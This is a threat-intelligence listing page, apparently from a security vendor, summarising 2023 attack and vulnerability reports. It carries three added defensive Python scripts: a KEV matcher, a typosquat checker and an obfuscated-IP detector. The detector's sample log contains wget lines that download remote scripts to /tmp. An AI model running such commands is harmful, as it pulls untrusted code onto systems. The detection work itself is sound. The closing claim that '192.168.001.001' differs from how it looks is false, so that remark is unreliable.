Chinese APT Masquerading as Cloud Services in Cambodia
Threat Level: Attack Report. For a detailed threat advisory, download the pdf file here. Summary: A Chinese APT targets the Cambodian government via disguised cloud services, aiming to access sensitive data in line with China's regional interests. The actors' working hours signal a Chinese origin, urging...
Millenium RAT the $30 Access Ticket to Data Theft
Attack Report. Summary: The Millenium RAT, a Win32 executable built on .NET (version 2.4), is available on GitHub for a one-time fee of $30, granting lifetime access. Notably, this RAT is actively developed and has...
SideCopy Leverages Multi-platform RAT, Assaults Indian Government Entities
Attack Report. Summary: A Pakistan-linked threat actor named SideCopy is exploiting WinRAR's CVE-2023-38831 vulnerability to target Indian government agencies. This vulnerability facilitates distribution of...
BlueNoroff Unleashes New macOS Malware ObjCShellz
Attack Report. Summary: A new macOS malware variant linked to the financially motivated BlueNoroff APT group, named "ObjCShellz", features remote shell capabilities and communicates with a suspicious domain. The malware, written in...
Iran-Backed Agrius APT’s Attacks on Israeli Institutions
Attack Report. Summary: In a series of harmful cyberattacks between January 2023 and October 2023, the Iranian-backed Advanced Persistent Threat (APT) group known as Agrius targeted Israel's education and technology...
Jupyter Infostealer Returns with New Addition to Its Arsenal
Attack Report. Summary: Jupyter Infostealer is a malware variant first discovered in late 2020. Since then it has continued to evolve, altering its delivery methods and techniques to avoid detection and establish...
Kinsing Exploits Looney Tunables Vulnerability to Breach Cloud Environments
Actor Report. Summary: The threat actor Kinsing has recently been observed exploiting the Linux privilege escalation vulnerability known as "Looney Tunables" (CVE-2023-4911) as part of a new campaign aimed at breaching cloud...
Attacks, Vulnerabilities and Actors 30 October to 5 November 2023
For a detailed threat digest, download the pdf file here. Summary: Over the past week, HiveForce Labs identified a total of six executed attacks, three instances of adversary activity, and one exploited...
Socks5Systemz Proxy Botnet Infects 10,000 Systems
Attack Report. Summary: A sophisticated proxy botnet known as Socks5Systemz has infiltrated over 10,000 computers by employing the PrivateLoader and Amadey malware loaders. The operators behind this botnet offer...
MuddyWater Returns with a New Spear-Phishing Campaign
Attack Report. Summary: MuddyWater, the Iranian nation-state actor, has been identified in a new spear-phishing campaign targeting two Israeli entities and deploying a legitimate remote administration tool, N-able Advanc...
Ransomware Threats Exploit CVE-2023-46604 in Apache ActiveMQ Servers
Vulnerability Report. Summary: Ransomware groups and SparkRAT operators are exploiting a critical vulnerability, CVE-2023-46604, in Apache ActiveMQ despite a security update released on October 27, 2023; affected systems run outdated ActiveMQ...
Scarred Manticore’s Middle Eastern Gambit
Attack Report. Summary: Scarred Manticore, an actor associated with Iran's Ministry of Intelligence and Security (MOIS), has been conducting a highly sophisticated cyber espionage campaign with a strong focus on the Middle East...
Summary of Vulnerabilities, Actors & Attacks: October 2023
...
CISA Known Exploited Vulnerability Catalog October 2023
For a detailed CISA KEV Catalog, download the pdf file here. Summary: The Known Exploited Vulnerabilities (KEV) catalog, maintained by CISA, is the authoritative source of vulnerabilities that have been exploited in the wild. It is recommended that all organizations review and monitor the KEV catalog,...
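The practical way to "review and monitor" the catalog is to diff it against your own vulnerability inventory and sort the overlap by CISA's remediation deadline. The script below is an added example written for this page, not Hive Pro's or CISA's code. It parses a constructed excerpt that follows the field names of CISA's public JSON feed (https://www.cisa.gov/sites/default/files/feeds/known_exploited_vulnerabilities.json); the CVE IDs are ones named in the advisories above, but the dates and ransomware flags in the excerpt are placeholders, not values copied from the live catalog.

```python
import json
from datetime import date
from typing import Dict, Iterable, List

# Constructed excerpt using the live feed's field names ("vulnerabilities", "cveID",
# "vendorProject", "product", "dateAdded", "dueDate", "knownRansomwareCampaignUse").
# Dates and flags are placeholders for illustration, not the live catalog's values.
KEV_SAMPLE = json.dumps({
    "title": "CISA Catalog of Known Exploited Vulnerabilities",
    "catalogVersion": "example",
    "count": 3,
    "vulnerabilities": [
        {"cveID": "CVE-2023-46604", "vendorProject": "Apache", "product": "ActiveMQ",
         "dateAdded": "2023-11-02", "dueDate": "2023-11-23",
         "knownRansomwareCampaignUse": "Known"},
        {"cveID": "CVE-2023-20198", "vendorProject": "Cisco", "product": "IOS XE Web UI",
         "dateAdded": "2023-10-16", "dueDate": "2023-10-20",
         "knownRansomwareCampaignUse": "Unknown"},
        {"cveID": "CVE-2023-4966", "vendorProject": "Citrix", "product": "NetScaler ADC and Gateway",
         "dateAdded": "2023-10-18", "dueDate": "2023-11-08",
         "knownRansomwareCampaignUse": "Known"},
    ],
})


def load_kev(kev_json: str) -> Dict[str, dict]:
    """Index catalog entries by CVE ID (upper-cased so inventory spelling does not matter)."""
    catalog = json.loads(kev_json)
    return {entry["cveID"].upper(): entry for entry in catalog["vulnerabilities"]}


def find_kev_matches(kev_json: str, inventory_cves: Iterable[str], today: date) -> List[dict]:
    """Return inventory CVEs that appear in KEV, earliest due date first.

    Each hit records the product, CISA's due date, whether that date has passed,
    and whether CISA has linked the CVE to ransomware campaigns.
    """
    index = load_kev(kev_json)
    hits = []
    for cve in {c.strip().upper() for c in inventory_cves}:
        entry = index.get(cve)
        if entry is None:
            continue  # in inventory but not (yet) in KEV
        due = date.fromisoformat(entry["dueDate"])
        hits.append({
            "cveID": cve,
            "product": f'{entry["vendorProject"]} {entry["product"]}',
            "dueDate": entry["dueDate"],
            "overdue": due < today,
            "ransomware": entry.get("knownRansomwareCampaignUse") == "Known",
        })
    # earliest remediation deadline first; ransomware-linked entries break ties
    hits.sort(key=lambda h: (h["dueDate"], not h["ransomware"]))
    return hits


if __name__ == "__main__":
    # Hypothetical inventory: CVE-2023-34048 is on this page but absent from the excerpt.
    inventory = ["cve-2023-46604", "CVE-2023-4966", "CVE-2023-34048"]
    for hit in find_kev_matches(KEV_SAMPLE, inventory, today=date(2023, 11, 10)):
        flag = "OVERDUE" if hit["overdue"] else "due " + hit["dueDate"]
        print(f'{hit["cveID"]:16} {hit["product"]:30} {flag}')
```

Against the live feed, replace `KEV_SAMPLE` with the downloaded JSON and pass `date.today()`; the matching and ordering logic is unchanged. Because due dates are CISA's binding-directive deadlines for federal agencies, sorting on them is a reasonable default prioritisation for everyone else too.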
Atlassian’s Latest Critical Confluence Flaw Poses Risk of Data Loss
Vulnerability Report. Summary: A critical vulnerability in Atlassian Confluence Data Center and Server, tracked as CVE-2023-22518, is an improper authorization issue. If successfully exploited by an...
Hackers Utilize MSIX App Packages to Disseminate GHOSTPULSE Malware
Attack Report. Summary: A new cyber attack campaign has emerged that uses fake MSIX Windows app packages masquerading as legitimate applications. These deceptive MSIX packages are employed to distribute a new malwar...
From Bullets to Bytes The Hamas-Israel Conflict Goes Digital
Attack Report. Summary: In the midst of the ongoing Israeli-Hamas conflict, a group of pro-Hamas hacktivists has emerged, utilizing a Linux-based wiper malware known as BiBi-Linux Wiper. In the broader context of...
Stop Putting Out Fires: It's Time to Change Vulnerability Management For the Better
In this video, Anand Choudha, CEO at Hive Pro, and Jeelan Poola, CPO at Hive Pro, introduce the HivePro Uni5 Threat Exposure Management Platform. HivePro Uni...
Celebrity Vulnerability Report | Navigating Challenges with HivePro Uni5
Attacks, Vulnerabilities and Actors 23 October to 29 October 2023
Summary: Over the past week, HiveForce Labs identified a total of seven executed attacks, two instances of adversary activity, and three exploited...
Lazarus Unleashes SIGNBT Malware in Latest Campaign
Attack Report. Summary: The Lazarus Group has been identified as the mastermind behind a recent cyber campaign. They persistently targeted a software vendor, successfully compromising the vendor's systems by exploiting software...
Redefining the StripedFly Malware Framework
Attack Report. Summary: An intricate cross-platform malware framework, known as StripedFly, operated discreetly for five years, surreptitiously compromising over a million Windows and Linux systems. It skillfully evaded in-dept...
VMware vCenter Flaws Leading to RCE Attacks
Vulnerability Report. Summary: Two vulnerabilities, CVE-2023-34048 and CVE-2023-34056, were identified in VMware vCenter Server, the server management software used for centralized management of virtual machines and ESXi hosts...
Winter Vivern Capitalizes on Zero-Day Flaw in Roundcube
Attack Report. Summary: The Winter Vivern cyberespionage group has been actively exploiting a zero-day vulnerability in the Roundcube webmail. The identified vulnerability, CVE-2023-5631, permits stored cross-site scripting...
YoroTrooper Covert Cyber Espionage Masters of Kazakhstan
Attack Report. Summary: YoroTrooper, a stealthy threat actor primarily focused on espionage, first emerged in June 2022. YoroTrooper's targets appear to be concentrated within the Commonwealth of Independent States (CIS) nations,...
Attackers Exploit Brazil’s PIX System with GoPIX Malware Campaign
Attack Report. Summary: The popularity of Brazil's PIX payment system has attracted cybercriminals using GoPIX malware, which targets users searching for "WhatsApp web" with malicious ads. This poses a threat to users' financial and...
Attackers Exploit VMware’s Aria Operations for Logs Vulnerability
Vulnerability Report. Summary: A critical authentication bypass vulnerability, CVE-2023-34051, in VMware Aria Operations for Logs allows remote code execution with root privileges under certain conditions, raising concerns for...
ExelaStealer A New Entrant in the InfoStealer Landscape
Attack Report. Summary: ExelaStealer is a newly discovered InfoStealer malware that emerged in August 2023. Its distinctive feature is being an open-source tool, customizable for a fee. Primarily coded in Python,...
Hackers Infiltrate Russian Government and Industrial Entities
Attack Report. Summary: Numerous governmental and pivotal industrial entities in Russia fell victim to a sophisticated Go-based custom backdoor. This malicious software was specifically crafted for data theft, suggesting its...
Quasar RAT Utilizes DLL Side-Loading to Evade Detection
Attack Report. Summary: Quasar RAT is an open-source remote access trojan that has been used by cybercriminals and threat actors for various malicious purposes. The use of DLL side-loading is a sophisticated technique that allo...
Attacks, Vulnerabilities and Actors 16 October to 22 October 2023
Summary: Over the past week, HiveForce Labs identified a total of twenty-three executed attacks, ten discovered vulnerabilities, and five active adversaries that were...
Mastering Threat Exposure with Uni5 Xposure
...
BlackCat Incorporates ‘Munchkin’ into Its Arsenal
Attack Report. Summary: The BlackCat ransomware group has introduced a new tool called Munchkin into its operations. This tool employs virtual machines (VMs) to stealthily deploy encryptors on network devices. Munchkin allows the...
Prolonged Pursuit of OilRig APT Targeting Middle East Government
Attack Report. Summary: The Iran-affiliated threat actor known as OilRig orchestrated a sophisticated eight-month campaign directed at a Middle Eastern government, during which the attackers managed to steal sensitive files and...
MATA Backdoor Targets Eastern European Industrial Companies
Attack Report. Summary: MATA, a sophisticated backdoor framework, has been updated to target Eastern European industrial companies via spear-phishing, compromising financial software servers and infiltrating networks, even...
In-Depth Analysis of Phobos Ransomware
Attack Report. Summary: Phobos ransomware, active since 2018, primarily targets small to medium-sized businesses with lower ransom demands. It uses compromised RDP connections and is distributed via a Ransomware-as-a-Service model...
North Korean Actors Behind Active Exploitation of TeamCity Vulnerability
Attack Report. Summary: The North Korean threat actor Lazarus and its subgroup Andariel are actively exploiting CVE-2023-42793, an authentication bypass vulnerability in TeamCity; after successful exploitation, ...
A Longstanding Zero-Day in Citrix Devices Exploited Since August
Vulnerability Report. Summary: A zero-day vulnerability, CVE-2023-4966, in Citrix NetScaler ADC and Gateway devices has been actively exploited since late August 2023. This exploit has the potential...
Kimsuky Unveils New Addition to Its Malware Arsenal
Actor Report. Summary: Kimsuky, a cyber-espionage group, is known for infiltrating via spear-phishing attacks and is recognized for its versatility in using various types of malware and tools to facilitate remote control durin...
Multiple State-Sponsored Groups Exploit WinRAR Vulnerability in Phishing Attacks
Attack Report. Summary: A series of phishing attacks linked to a Russian state-sponsored group leverages a WinRAR vulnerability to steal data, including browser credentials, via PowerShell commands and exfiltrates it through ...
BbyStealer’s Tactic for Targeting VPN Users
Attack Report. Summary: The BbyStealer malware has resurfaced and is running a sophisticated information-theft campaign, utilizing numerous phishing domains to target users of VPN applications engaged in downloading activities,...
Unpatched Zero-Day Vulnerability Actively Exploited in Cisco IOS XE
Vulnerability Report. Summary: The critical, unpatched security vulnerability identified as CVE-2023-20198 affects Cisco IOS XE software, the network operating system used in Cisco network devices. The identified...
Lazarus Group’s Targeted Attacks on Korean Sectors
Attack Report. Summary: Lazarus, a state-sponsored threat group, has been employing sophisticated tactics like spear phishing and supply chain attacks, and utilizing various types of malware for control...
A New XorDDoS Linux Trojan That Launches Powerful DDoS Attacks
Attack Report. Summary: The XorDDoS Trojan, a Linux-based malware, orchestrates DDoS attacks through infected devices, with a recent campaign detected in 2023. Attackers employ scanning, persistence, and C2 infrastructure...
Storm-0978 unleashes PEAPOD to target Women Political Leaders
Attack Report. Summary: Storm-0978, a threat actor group, utilized a new variant of the RomCom backdoor, "ROMCOM 4.0", also referred to as PEAPOD, to target attendees of the Women Political Leaders (WPL) Summit in Brussels. This...
Attacks, Vulnerabilities and Actors 9 October to 15 October 2023
Summary: Over the past week, HiveForce Labs identified a total of twenty executed attacks, two instances of adversary activity, and fourteen vulnerabilitie...
SeroXen RAT Leverages NuGet Packages
Attack Report. Summary: Several malicious packages have been detected in NuGet, a widely used package manager for the .NET Framework. These packages used typosquatting to masquerade as legitimate ones and were...
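Typosquatting works because a one- or two-character slip still resolves to a real package. A cheap pre-install check is to compare every requested package name against the names you actually depend on and refuse near misses. The script below is an added example written for this page, not Hive Pro's tooling nor anything from the NuGet campaign; the allow-list is a constructed set of well-known NuGet package names standing in for an organisation's own dependency list, and the misspelled candidates fed to it are constructed test inputs, not package names observed in the wild.

```python
from typing import List, Set, Tuple

# Constructed allow-list: real, widely used NuGet package names standing in for the
# dependencies an organisation already trusts. A real deployment would generate this
# from lock files or a curated internal feed.
KNOWN_PACKAGES: Set[str] = {"Newtonsoft.Json", "Serilog", "Dapper", "AutoMapper", "Moq"}


def edit_distance(a: str, b: str) -> int:
    """Case-insensitive Levenshtein distance (insert/delete/substitute), classic DP."""
    a, b = a.lower(), b.lower()
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1,            # delete ca
                           cur[j - 1] + 1,         # insert cb
                           prev[j - 1] + (ca != cb)))  # substitute
        prev = cur
    return prev[-1]


def typosquat_candidates(name: str, known: Set[str] = KNOWN_PACKAGES) -> List[Tuple[str, int]]:
    """Known packages that `name` is suspiciously close to, nearest first.

    An exact (case-insensitive) match is not a typosquat. The tolerated distance is
    1 for short names and 2 for longer ones, so "Dapr" is not flagged against
    "Dapper" while "Newtonsoft.Jsn" is flagged against "Newtonsoft.Json".
    """
    lowered = {k.lower() for k in known}
    if name.lower() in lowered:
        return []
    hits = []
    for k in known:
        allowed = 1 if len(k) <= 6 else 2
        d = edit_distance(name, k)
        if d <= allowed:
            hits.append((k, d))
    return sorted(hits, key=lambda h: h[1])


if __name__ == "__main__":
    # Constructed candidate names, not packages seen in the campaign.
    for candidate in ["Newtonsoft.Jsn", "Serillog", "Dapr", "Newtonsoft.Json"]:
        print(candidate, "->", typosquat_candidates(candidate) or "ok")
```

Run this over a restore's resolved package list before it reaches the build; anything flagged is either a typo in your own manifest or a package that deserves a look before it executes install-time code. Distance alone misses homoglyph and prefix tricks (an extra `.Core` suffix, for instance), so treat it as one signal alongside registry age and publisher checks.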
Revealing DarkGate’s Incursion Across Continents
Attack Report. Summary: A threat actor has been using compromised Skype and Microsoft Teams accounts to distribute DarkGate, a loader campaign primarily targeting the Americas region...
ShellBot Malware Evades Detection Using Hexadecimal IP Addresses
Attack Report. Summary: ShellBot malware, targeting poorly managed Linux SSH servers, now employs hexadecimal IP addresses in its download URLs to evade detection. This change highlights the need for strong security measures an...
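The trick works because libc name resolution (inet_aton semantics) accepts a single 32-bit integer in hex, octal or decimal, or fewer than four dotted parts, as a valid IPv4 address, while most signatures only look for dotted quads. The detection below is an added example written for this page, not code from Hive Pro or from the ShellBot analysis; it normalises every numeric host found in a URL back to dotted-quad form and flags the ones that were written any other way. The log lines are constructed to exercise each notation and are not captured ShellBot traffic.

```python
import re
import string
from typing import Dict, List, Optional

# Host portion of http(s) URLs; stops at '/', ':', whitespace or quotes.
URL_HOST_RE = re.compile(r"https?://([^/\s:'\"]+)", re.IGNORECASE)


def _parse_component(part: str) -> Optional[int]:
    """One dotted component with inet_aton(3) rules: 0x.. hex, leading-0 octal, else decimal."""
    if part[:2].lower() == "0x":
        digits = part[2:]
        if digits and all(c in string.hexdigits for c in digits):
            return int(digits, 16)
        return None
    if not part or not all(c in string.digits for c in part):
        return None
    if len(part) > 1 and part[0] == "0":
        try:
            return int(part, 8)
        except ValueError:  # "09" is not valid octal, so not an address
            return None
    return int(part)


def normalize_numeric_host(host: str) -> Optional[str]:
    """Dotted-quad form of a numeric host in any inet_aton notation, or None if not numeric.

    With fewer than four parts the last part fills the remaining bytes, so
    "0x7f000001", "0177.0.0.1" and "2130706433" all become "127.0.0.1".
    """
    parts = host.split(".")
    if not 1 <= len(parts) <= 4:
        return None
    values = [_parse_component(p) for p in parts]
    if any(v is None for v in values):
        return None
    *head, tail = values
    if any(v > 255 for v in head):
        return None
    tail_bytes = 4 - len(head)
    if tail >= 1 << (8 * tail_bytes):
        return None
    addr = 0
    for v in head:
        addr = (addr << 8) | v
    addr = (addr << (8 * tail_bytes)) | tail
    return ".".join(str((addr >> s) & 0xFF) for s in (24, 16, 8, 0))


def find_obfuscated_hosts(log_text: str) -> List[Dict[str, object]]:
    """Flag URLs whose host is numeric but not written as a plain dotted quad."""
    findings = []
    for line_no, line in enumerate(log_text.splitlines(), 1):
        for host in URL_HOST_RE.findall(line):
            resolved = normalize_numeric_host(host)
            if resolved is not None and resolved != host:
                findings.append({"line": line_no, "host": host, "resolved": resolved})
    return findings


# Constructed sample, not real ShellBot traffic: one plain dotted quad (not flagged)
# and three obfuscated forms (flagged).
SAMPLE_LOG = """\
Nov 06 10:12:01 web1 sshd[2213]: Accepted password for root from 203.0.113.50 port 51022 ssh2
Nov 06 10:12:04 web1 bash[2290]: wget http://0x2f7e2b6b/pwn.sh -O /tmp/pwn.sh
Nov 06 10:12:05 web1 bash[2291]: curl -s http://198.51.100.7/update.txt
Nov 06 10:12:09 web1 bash[2295]: curl http://0x7f.0x0.0x0.0x1:8080/x
Nov 06 10:12:11 web1 bash[2297]: wget http://3232235777/s.pl
"""

if __name__ == "__main__":
    for f in find_obfuscated_hosts(SAMPLE_LOG):
        print(f'line {f["line"]}: {f["host"]} -> {f["resolved"]}')
```

The same normaliser is worth running over proxy and DNS logs, not only shell history: a numeric host that is not a dotted quad is rare in legitimate traffic, so the false-positive rate is low, and the resolved address can be matched directly against existing blocklists. The octal case is the one most detections forget: "192.168.001.001" is not the same address as it looks.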
In-Depth Analysis of AvosLocker Ransomware
Attack Report. Summary: AvosLocker, also known as Avos, is a ransomware-as-a-service operation that targets critical infrastructure organizations, primarily in the US, and has expanded to target both Windows and Linux systems. Its...